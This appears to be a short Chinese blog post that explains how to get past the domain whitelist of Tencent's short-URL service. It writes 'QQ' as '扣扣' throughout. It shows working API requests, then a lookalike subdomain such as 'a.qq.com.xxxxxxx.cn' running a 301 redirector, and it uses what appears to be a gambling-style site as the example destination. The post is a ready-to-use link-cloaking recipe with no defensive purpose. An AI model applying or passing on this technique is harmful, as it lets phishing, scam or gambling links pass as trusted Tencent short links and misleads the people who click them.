关于腾讯短网址突破白名单
关于腾讯短网址突破白名单
请求地址 https://vip.video.扣扣.com/fcgi-bin/comm_cgi?name=short_url&need_short_url=1&url=长链接
返回是
扣ZOutputJson=({
"msg" : "非白名单域名!",
"扣rcode" : "",
"ret" : -11013,
"short_url" : ""
}
);
但是你把长链接加上www.扣扣.com
https://vip.video.扣扣.com/fcgi-bin/comm_cgi?name=short_url&need_short_url=1&url=https://www.扣扣.com.jxdbg.com.cn/
返回是
扣ZOutputJson=({
"msg" : "ok",
"扣rcode" : "",
"ret" : 0,
"short_url" : "https://url.cn/t7znNwdH"
}
);
得出结论,找一个域名解析前缀为a.扣扣.com
比如二级域名 a.扣扣.com.xxxxxxx.cn
用这个站点搭建一个站点负责跳转
请求 https://vip.video.扣扣.com/fcgi-bin/comm_cgi?name=short_url&need_short_url=1&url=http://a.扣扣.com.xxxxxxx.cn/?url=https://www.dbg999.com/
http://a.扣扣.com.xxxxxxx.cn/?url=https://www.dbg999.com/
只需要获取到GET的url参数名 让后直接301跳即可
发表评论: